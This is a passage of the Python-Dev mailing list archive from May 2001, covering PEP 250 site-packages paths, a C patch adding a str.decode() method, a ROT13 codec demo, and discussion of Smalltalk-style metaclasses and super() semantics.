Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid>

PEP 250 suggests changing the sitedirs setup in site.py from

    sitedirs = [prefix]

to

    sitedirs == [makepath(prefix, "lib", "site-packages")]

on windows. it then goes on to say that

    This change does not preclude packages using the current
    location -- the change only adds a directory to sys.path, it
    does not remove anything.

this isn't true (even after correcting the typo), since the
sitedirs list isn't only added to the path; it's also used to
look for PTH files.  after this change, PTH files located under
prefix will no longer be found.

the following change works a bit better:

    sitedirs = [prefix, makepath(prefix, "lib", "site-packages")]

Cheers /F


From mal at lemburg.com  Wed May  2 21:55:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 21:55:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
Message-ID: <3AF0662D.48671B4E@lemburg.com>

Guido van Rossum wrote:
> 
> > > Can you provide examples of where this can't be done using the
> > > existing approach?
> >
> > There is no existing elegant approach except hooking up to the
> > codecs directly. Adding .decode() is really a matter of adding
> > symmetry.
> 
> Yes, but symmetry is good except when it isn't. :-)
> 
> > Here are some example of how these two codec methods could
> > be used:
> >
> >       xmltext = binarydata.encode('base64')
> >       ...
> >       binarydata = xmltext.decode('base64')
> >
> >       zzz = data.encode('gzip')
> >       ...
> >       data = zzz.decode('gzip')
> >
> >       jpegimage = gifimage.decode('gif').encode('jpeg')
> >
> >       mp3audio = wavaudio.decode('wav').encode('mp3')
> >
> >       etc.
> 
> How would you do this currently?

By looking up the codecs using the codec registry and
then calling them directly.
 
> > Basically all content transfer encodings can take advantage of
> > these two methods.
> >
> > It's not really code bloat, BTW, since the C API is there;
> > the .decode() method would just expose it.
> 
> Show me the patch and I'll decide whether it's code bloat. :-)

I've attached the patch. Due to a small reorganisation the
patch is a little longer -- symmetry has its price at C level
too ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
--- CVS-Python/Include/stringobject.h	Sat Feb 24 10:30:49 2001
+++ Dev-Python/Include/stringobject.h	Wed May  2 21:05:12 2001
@@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE
     PyObject *str,	 	/* string object */
     const char *encoding,	/* encoding */
     const char *errors		/* error handling */
     );
 
+/* Decodes a string object and returns the result as Python string
+   object. */
+
+extern DL_IMPORT(PyObject*) PyString_AsDecodedString(
+    PyObject *str,	 	/* string object */
+    const char *encoding,	/* encoding */
+    const char *errors		/* error handling */
+    );
+
 /* Provides access to the internal data buffer and size of a string
    object or the default encoded version of an Unicode object. Passing
    NULL as *len parameter will force the string buffer to be
    0-terminated (passing a string with embedded NULL characters will
    cause an exception).  */
--- CVS-Python/Objects/stringobject.c	Wed May  2 16:19:22 2001
+++ Dev-Python/Objects/stringobject.c	Wed May  2 21:04:34 2001
@@ -138,42 +138,56 @@ PyString_FromString(const char *str)
 PyObject *PyString_Decode(const char *s,
 			  int size,
 			  const char *encoding,
 			  const char *errors)
 {
-    PyObject *buffer = NULL, *str;
+    PyObject *v, *str;
+
+    str = PyString_FromStringAndSize(s, size);
+    if (str == NULL)
+	return NULL;
+    v = PyString_AsDecodedString(str, encoding, errors);
+    Py_DECREF(str);
+    return v;
+}
+
+PyObject *PyString_AsDecodedString(PyObject *str,
+				   const char *encoding,
+				   const char *errors)
+{
+    PyObject *v;
+
+    if (!PyString_Check(str)) {
+        PyErr_BadArgument();
+        goto onError;
+    }
 
     if (encoding == NULL)
 	encoding = PyUnicode_GetDefaultEncoding();
 
     /* Decode via the codec registry */
-    buffer = PyBuffer_FromMemory((void *)s, size);
-    if (buffer == NULL)
-        goto onError;
-    str = PyCodec_Decode(buffer, encoding, errors);
-    if (str == NULL)
+    v = PyCodec_Decode(str, encoding, errors);
+    if (v == NULL)
         goto onError;
     /* Convert Unicode to a string using the default encoding */
-    if (PyUnicode_Check(str)) {
-	PyObject *temp = str;
-	str = PyUnicode_AsEncodedString(str, NULL, NULL);
+    if (PyUnicode_Check(v)) {
+	PyObject *temp = v;
+	v = PyUnicode_AsEncodedString(v, NULL, NULL);
 	Py_DECREF(temp);
-	if (str == NULL)
+	if (v == NULL)
 	    goto onError;
     }
-    if (!PyString_Check(str)) {
+    if (!PyString_Check(v)) {
         PyErr_Format(PyExc_TypeError,
                      "decoder did not return a string object (type=%.400s)",
-                     str->ob_type->tp_name);
-        Py_DECREF(str);
+                     v->ob_type->tp_name);
+        Py_DECREF(v);
         goto onError;
     }
-    Py_DECREF(buffer);
-    return str;
+    return v;
 
  onError:
-    Py_XDECREF(buffer);
     return NULL;
 }
 
 PyObject *PyString_Encode(const char *s,
 			  int size,
@@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb
         return NULL;
     return PyString_AsEncodedString((PyObject *)self, encoding, errors);
 }
 
 
+static char decode__doc__[] =
+"S.decode([encoding[,errors]]) -> string\n\
+\n\
+Return a decoded string version of S. Default encoding is the current\n\
+default string encoding. errors may be given to set a different error\n\
+handling scheme. Default is 'strict' meaning that encoding errors raise\n\
+a ValueError. Other possible values are 'ignore' and 'replace'.";
+
+static PyObject *
+string_decode(PyStringObject *self, PyObject *args)
+{
+    char *encoding = NULL;
+    char *errors = NULL;
+    if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors))
+        return NULL;
+    return PyString_AsDecodedString((PyObject *)self, encoding, errors);
+}
+
+
 static char expandtabs__doc__[] =
 "S.expandtabs([tabsize]) -> string\n\
 \n\
 Return a copy of S where all tab characters are expanded using spaces.\n\
 If tabsize is not given, a tab size of 8 characters is assumed.";
@@ -2347,10 +2373,11 @@ string_methods[] = {
 	{"title",       (PyCFunction)string_title,       1, title__doc__},
 	{"ljust",       (PyCFunction)string_ljust,       1, ljust__doc__},
 	{"rjust",       (PyCFunction)string_rjust,       1, rjust__doc__},
 	{"center",      (PyCFunction)string_center,      1, center__doc__},
 	{"encode",      (PyCFunction)string_encode,      1, encode__doc__},
+	{"decode",      (PyCFunction)string_decode,      1, decode__doc__},
 	{"expandtabs",  (PyCFunction)string_expandtabs,  1, expandtabs__doc__},
 	{"splitlines",  (PyCFunction)string_splitlines,  1, splitlines__doc__},
 #if 0
 	{"zfill",       (PyCFunction)string_zfill,       1, zfill__doc__},
 #endif

From mal at lemburg.com  Wed May  2 22:36:30 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 22:36:30 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  
		            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <3AF06FCE.854D4DF7@lemburg.com>

Here's a little fun codec to play with. It encodes the input
using the ROT13 encoding (which is 1-1 and idempotent). The
main difference over the existing codecs is that it returns
a string rather than Unicode.

To install it, simply place it in some directory on your Python 
path.

Here's some sample output (Netscape can unscramble this BTW):

"""
Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg
hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur
znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf
n fgevat engure guna Havpbqr.

Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba 
cngu.
"""

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/
-------------- next part --------------
A non-text attachment was scrubbed...
Name: rot_13.py
Type: text/python
Size: 2066 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010502/9cbfa6dd/attachment.bin>

From guido at digicool.com  Thu May  3 00:11:07 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 17:11:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200."
             <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>  
            <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook> 
Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>

> [From Jim Althoff]
> > In the list below, indentation indicates class hieararchy (superclass --
> > subclass)
> The indentation, unfortunately, seems to be destroyed.
[...]
> A question for Jim (this is more Smalltalk than Python related):
> How does the Behaviour class fit into this picture?

Jim responded with a much clearer diagram, and as a bonus an answer to
your question about Behaviour!

> Hi Guido,
> 
> Sorry about the mangled diagram.  It's kind of tricky doing this with just
> text.  :-)    Anyway, below is a -- hopefully -- improved diagram and
> description.
> 
> At the very bottom is an answer to the question about "Behavior".
> 
> Jim
> 
> ==========================================
> 
> Smalltalk-80 (simplified) class/metaclass structure:
> 
> Terminology:
> o A "class" is an object that can be instantiated.
> o A "metaclass" is a class and is one such that when _it_ is instantiated
> _that_ instance is _itself_ a class (which can be instantiated).
> (A metaclass is a specialization of class).
> 
> Essentially,  there are two parallel hierarchies: 1) the class hierarchy
> and 2) the metaclass hierarchy.  The class hierarchy starts with class
> Object.  The metaclass hierarchy starts right below Class with the
> metaclass ObjectMetaClass.
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
> 
> Object is the top of the class hierarchy (and total hierarchy).  It has no
> superclass.  It is the only class that has no superclass.
> Class is a subclass of Object.
> MetaClass is a subclass of Class.
> 
> ObjectMetaClass is also a subclass of Class.
> ClassMetaClass is a subclass of ObjectMetaClass.
> MetaClassMetaClass is a subclass of ClassMetaClass.
> 
> Adding in application classes Rectangle and SpamRectangle then might look
> like:
> 
> <none>
> o Object
>     o Class
>         o MetaClass
>         o ObjectMetaClass
>             o ClassMetaClass
>                 o MetaClassMetaClass
>             o RectangleMetaClass
>                 o SpamRectangleMetaClass
>     o Rectangle
>         o SpamRectangle
> 
> Rectangle is a subclass of Object.
> SpamRectangle is a subclass of Rectangle.
> 
> RectangleMetaClass is a subclass of ObjectMetaClass.
> SpamRectangleMetaClass is a subclass of RectangleMetaClass.
> 
> Rectangle is an instance of RectangleMetaClass.
> SpamRectangle is an instance of SpamRectangleMetaClass.
> (SpamRectangleMetaClass is an instance of MetaClass.)
> 
> The next list shows both the subclass- and the instanceOf- relationships
> between classes and metaclasses.
> 
> In this list a class listed below another class is a subclass of it.
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam --
> the class of which class Spam is an instance).
> 
> <none>                Class
> Object    instanceOf  ObjectMC    instanceOf  MetaClass
> Class     instanceOf  ClassMC     instanceOf  MetaClass
> MetaClass instanceOf  MetaClassMC instanceOf  MetaClass
> 
> ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances
> of MetaClass.
> 
> MetaClass is an instance of MetaClassMetaClass  But MetaClassMetaClass is
> an instance of MetaClass.  So this particular relationship is circular.
> (In Smalltalk-76, Class was an instance of itself.)
> 
> Application classes would have a similar, parallel hierarchy between
> classes and their associated metaclasses.  For example:
> 
> Object        instanceOf ObjectMC        instanceOf MetaClass
> Rectangle     instanceOf RectangleMC     instanceOf MetaClass
> SpamRectangle instanceOf SpamRectangleMC instanceOf MetaClass
> 
> When you create class SpamRectangle as a subclass of class Rectangle, the
> code in the class-creation method first creates the metaclass
> SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of
> RectangleMetaClass.  The code then creates the SpamRectangle class as an
> instance of the SpamRectangleMetaClass metaclass it just created.
> 
> You can then create instances of class SpamRectangle.
> 
> SpamRectangle "instance methods" reside in the method dict of
> SpamRectangle.
> SpamRectangle "class methods" reside in the method dict of
> SpamRectangleMetaClass.
> 
> ============================
> 
> Regarding Thomas' question:
> 
> The Smalltalk-80 class hierarchy actually has a bit more factoring than
> what I show above.  In particular, Class and MetaClass are subclasses of
> the class ClassDescription.  ClassDescription is a subclass of class
> Behavior.  Behavior is a subclass of Object.
> 
> So it looks like:
> 
> <none>
> o Object
>     o Behavior
>         o ClassDescription
>             o MetaClass
>             o Class
>                 o ObjectMetaClass
>                     o BehaviorMetaClass
>                         o ClassDescriptionMetaClass
>                             o MetaClassMetaClass
>                             o ClassMetaClass
> 
> Class Behavior basically abstracts the creation and handling of method
> dict.s.  Class ClassDescription factors out common, reusable code between
> MetaClass and Class.  Clearly there are a number of ways of designing (or
> over-designing <wink> ) this part of the hierarchy.  The key idea, though,
> was to use the subclassing mechanism as a way of supportig specialized
> class methods.
> 
> =============================

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May  2 23:24:28 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 2 May 2001 17:24:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77
In-Reply-To: <E14v35l-0007pQ-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKJPAA.tim.one@home.com>

[Fred L. Drake]
> Update the filter() and list() descriptions to include information
> about the support for containers and iteration.
> ...
>   \begin{funcdesc}{list}{sequence}
> !   Return a list whose items are the same and in the same order as
> !   \var{sequence}'s items.  \var{sequence} may be either a sequence,
> !   a container that supports iteration, or an iterator object.
> ...

[and similarly for filter()]

Before we repeat this last incantation umpteen more times in the docs, is
this how we want it to read in the end?  The truth of the implementation and
of the design is that "sequence" is any object that supports iteration,
period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they
raise TypeError).  "A sequence" and "an iterator object" *always* support
iteration, so naming them too appears to draw a distinction that doesn't
exist.

Suggested alternative:

    \var{sequence} must support iteration (see XXX).

where XXX is common boilerplate explaining what "support iteration" means,
and that sequences and iterator objects are just particular cases of that.
Note that this boilerplate may expand to include generators too before 2.2 is
real, and a generator isn't really "a container that supports iteration" (the
word "container" is a strain in the generator context).  That is, a
long-winded incantation is just going to get longer over time, and if it's
repeated umpteen places in the docs I doubt they'll all get updated when
needed.


From michel at digicool.com  Wed May  2 23:43:42 2001
From: michel at digicool.com (Michel Pelletier)
Date: Wed, 2 May 2001 14:43:42 -0700 (PDT)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>


On Wed, 2 May 2001, Guido van Rossum wrote:

> > <none>
> > o Object
> >     o Class
> >         o MetaClass
> >         o ObjectMetaClass
> >             o ClassMetaClass
> >                 o MetaClassMetaClass
> >
> > Object is the top of the class hierarchy (and total hierarchy).  It has no
> > superclass.  It is the only class that has no superclass.
> > Class is a subclass of Object.
> > MetaClass is a subclass of Class.
> >
> > ObjectMetaClass is also a subclass of Class.
> > ClassMetaClass is a subclass of ObjectMetaClass.
> > MetaClassMetaClass is a subclass of ClassMetaClass.

Does this go on ad infinitum?  ie, is there a ClassMetaClassMetaClass
which sublcasses MetaClassMetaClass and so on?  I was under the impression
from talking to JimF that Smalltalk eventually stopped at a class
that is a subclass of itself.

-Michel


From greg at cosc.canterbury.ac.nz  Thu May  3 03:35:29 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 13:35:29 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com>
Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> I'm not sure I can follow you here: DictType.__repr__ is the
> representation method of the dictionary and not inherited
> from TypeType, so there should be no problem.

The problem is that DictType.__repr__ could mean either
the unbound method for finding the repr of a dictionary,
or the bound method for finding the repr of DictType
itself.

This ambiguity is inherent in the Python language as soon
as you try to make classes into instances (which you have
to do as a consequence of making types into classes).

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:15:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:15:41 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <Pine.LNX.4.32.0105021441060.780-100000@localhost.localdomain>
Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz>

Michel Pelletier <michel at digicool.com>:

> I was under the impression
> from talking to JimF that Smalltalk eventually stopped at a class
> that is a subclass of itself.

Some years ago, while playing with Sun's Postscript-based
NeWS window system, I devised an OO language (called P) that 
got translated into PostScript. It had a very Smalltalk-like
class/metaclass system, although rather simpler than what
JimF described. As I remember, the kernel consisted
of a little knot of about 6 classes with some interesting
incestuous relationships between them.

If anyone's interested, I could dig out the code and
provide details of how it all worked. There might be some
ideas that could be used in Python.

(Programming in P felt a lot like programming in Python,
by the way. If my name had been Guido, who knows where it
might have led!)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:25:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:25:12 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AEFF710.9471.8025D7EA@localhost>
Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz>

Gordon McMillan <gmcm at hypernet.com>:

> I would like to see ... some discussion of the expected 
> pragmatic benefits. (That's a different topic from subclassing 
> types.)

Actually, it's not -- the two issues are connected.

Suppose we succeed in unifying types and classes. Then
instead of classes being of type ClassType, they are
now instances of ClassClass. So classes are also
instances, or in other words, we have unified classes
and instances.

So even if we don't go as far as adding Smalltalk-style
class-methods-via-metaclasses, we still have to deal
with the fact that some things will be both classes
and instances.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:27:34 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:27:34 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com>
Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz>

Guido:

> Actually, I think that what's in the __dict__ is just perfect

I was thinking of backwards compatibility for people who
are hacking the __dict__ of a class directly.

If you don't care about that, the problem is simpler.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May  3 05:39:08 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 15:39:08 +1200 (NZST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com>
Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz>

Guido:

> Will we need to add a "::" operator to Python???

If so, I hope we can find a syntax that doesn't remind
one of C++ so much...

I have an idea! 

How about spelling super(self, MyBaseClass) as

   MyBaseClass[self]

This can be thought of as a sort of "cast" which turns self
into an object which behaves like it were an instance of
MyBaseClass. Then we can write

   MyBaseClass[self].foo(args)

Advantages:
* Concise and uncluttered
* No new syntax needed
* Can be implemented using existing mechanisms
* Doesn't even remotely resemble anything in C++ :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Thu May  3 07:49:04 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 3 May 2001 01:49:04 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <3AF01381.592AE31B@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>

[MAL, on basemethods]
> ...
> In other words: you let Python continue the search for the method
> as if it hadn't found the occurrance calling the bsaemethod()
> API. Hmm, still not clear enough... better let Tim jump in here
> (we've had a discussion about basemethod() some months or years
> ago). Tim ?

Sorry, I'm not sure what either of you is talking about.  In

class A(B, C):
    def foo(self):
        super.foo()

Guido said that super would start searching at B, but I don't know what your
"continue the search for the method as if it hadn't found the occurrance
calling the bsaemethod() API" means:  defining what a thing does in terms of
an unspecified API it doesn't use is a pretty sure recipe for compounded
confusion <wink>.

Given that we're using Python's search rules, the ambiguous point remaining
is whether:

    super.f()

textually contained in a method of class K begins searching with:

    1) K.__bases__

or with:

    2) self.__class__.__bases__

Java uses #1, and Guido's "the search starts with B" implies that he would
too.  But it's unclear whether he meant that.  Given also

class D(A):
    def foo(self):
        super.foo()

D().foo()

both views agree that D.foo() is invoked first, and that D.foo() invokes
A.foo() next.  But under #1 A.foo() invokes C.foo() or D.foo() next, while
under #2 A.foo() invokes A.foo() again.  Multiple inheritance is a red
herring here -- take C out of A's bases, and the same ambiguity needs to be
resolved.


From greg at cosc.canterbury.ac.nz  Thu May  3 07:56:07 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 03 May 2001 17:56:07 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEPNJPAA.tim.one@home.com>
Message-ID: <200105030556.RAA16509@s454.cosc.canterbury.ac.nz>

Tim:

> Java uses #1, and Guido's "the search starts with B" implies that he would
> too.  But it's unclear whether he meant that.

It's the only sane thing for him to mean, as far as I can see.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From pf at artcom-gmbh.de  Thu May  3 08:29:03 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Thu, 3 May 2001 08:29:03 +0200 (MEST)
Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk)
In-Reply-To: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> from Greg Ewing at "May 3, 2001  3:39: 8 pm"
Message-ID: <m14vCbn-000D2zC@artcom0.artcom-gmbh.de>

Hi,

Greg Ewing:
[...]
> How about spelling super(self, MyBaseClass) as
> 
>    MyBaseClass[self]
> 
> This can be thought of as a sort of "cast" which turns self
> into an object which behaves like it were an instance of
> MyBaseClass. Then we can write
> 
>    MyBaseClass[self].foo(args)
> 
> Advantages:
> * Concise and uncluttered
> * No new syntax needed
> * Can be implemented using existing mechanisms
> * Doesn't even remotely resemble anything in C++ :-)

Disadvantages:
* People will confuse this with calling MyBaseClass.__getitem__(....)
* Doesn't even remotely resemble anything in C++

We have to face it:  I myself don't like C++ either, but a *lot*
of people today are already familar with C++ today.  Giving them
something they are already familar with, will make it easier to
convert some of them to Python.

To Greg: This '::' operator is not at all that ugly and AFAI can see
would not introduce any backward incompatible change to the language.
I'm sure C++ has some other real warts to offer that we both don't
want to see in a future version of Python.  Right?

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From mal at lemburg.com  Thu May  3 09:49:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 09:49:37 +0200
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
References: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz>
Message-ID: <3AF10D91.802C8555@lemburg.com>

Greg Ewing wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com>:
> 
> > I'm not sure I can follow you here: DictType.__repr__ is the
> > representation method of the dictionary and not inherited
> > from TypeType, so there should be no problem.
> 
> The problem is that DictType.__repr__ could mean either
> the unbound method for finding the repr of a dictionary,
> or the bound method for finding the repr of DictType
> itself.
> 
> This ambiguity is inherent in the Python language as soon
> as you try to make classes into instances (which you have
> to do as a consequence of making types into classes).

We are actually trying to turn classes into types here :-)

Really, I think that we could resolve this issue by not inheriting
from meta-classes. DictType is a creation of the meta-class
TypeType. I'm not calling these instances to prevent additional
confusion. The root of the problem is that for some reason there
is belief that DictType should implicitly inherit attributes and 
methods from TypeType. If we simply say that there is no implicit
inheritance (only explicit one), then these problems should go
away.

Some of these ideas are burried in the "super" part of this 
thread. Unfortunately this concept doesn't go very far since
Python has multiple inheritance and thus the term "super"
(referring to the class' single base class) is not well-defined.

As Jim mentioned in his reply to Thomas' question, SmallTalk
has two parallel hierarchies. One for the classes and one for
the meta-classes. If we follow the same path in Python and
keep the two well separated, I think we can resolve many of
the issues which are currently showing up.

To link the two hierarchies together we don't need a "super"
concept, but instead a way to reach the meta-class in charge
of a class, say "klass.__creator__". 

Note that there's another issue hiding in all this and again
this is due to multiple inheritance: which meta-class is in
charge of a class which is derived from two classes having
different meta-classes ?

meta1            -->         o klass1
                               o klass1a
                               o klass1b
meta2            -->         o klass2
                               o klass2a
                               o klass2b

class klass3(klass1a, klass2b):
      ...                  

I think there's no clean way to resolve this, so I'd suggest
to simply rule this out and declare it illegal (class can
only be based on classes having the same meta-class).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From barry at digicool.com  Thu May  3 10:24:16 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 3 May 2001 04:24:16 -0400
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com>
	<200105021918.OAA03080@cj20424-a.reston1.va.home.com>
	<3AF052CE.E928BDA1@lemburg.com>
	<200105021938.OAA03550@cj20424-a.reston1.va.home.com>
	<3AF0662D.48671B4E@lemburg.com>
	<3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <15089.5552.164307.344721@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> Here's a little fun codec to play with. It encodes the input
    M> using the ROT13 encoding (which is 1-1 and idempotent).

LOL!  Guess what `language' I chose to use when testing Mailman's i18n
support?  :)

-Barry


From fredrik at pythonware.com  Thu May  3 10:11:10 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Thu, 3 May 2001 10:11:10 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com>
Message-ID: <028a01c0d3a8$9e05f190$e46940d5@hagrid>

mal wrote:
 
> Here's some sample output (Netscape can unscramble this BTW):

heh.  just discovered that outlook express can deal with this
too -- but only if the message comes from the usenet.

on ordinary mail, the "unscramble rot13" menu entry is disabled
(too much usability testing?)

maybe you could repost your secret message to comp.lang.python ;-)

Cheers /F


From mal at lemburg.com  Thu May  3 11:05:41 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 03 May 2001 11:05:41 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com>  	            <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AF06FCE.854D4DF7@lemburg.com> <028a01c0d3a8$9e05f190$e46940d5@hagrid>
Message-ID: <3AF11F65.5CBF508C@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > Here's some sample output (Netscape can unscramble this BTW):
> 
> heh.  just discovered that outlook express can deal with this
> too -- but only if the message comes from the usenet.
> 
> on ordinary mail, the "unscramble rot13" menu entry is disabled
> (too much usability testing?)
> 
> maybe you could repost your secret message to comp.lang.python ;-)

It wasn't all that secret: I simply cut&pasted the first
two paragraphs of the message through the codec.

There was also an inaccuracy in the posting: the codec still
produces Unicode (by virtue of using the charmap codec as
basis). 

Still, it serves as nice example of what str.decode()
and str.encode() can be used for and also demonstrates how
easy it is to install new codecs.

I think I'll repost it to c.l.p though -- with a new secret 
attached to it ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Thu May  3 16:26:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 03 May 2001 09:26:22 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Thu, 03 May 2001 09:49:37 +0200."
             <3AF10D91.802C8555@lemburg.com> 
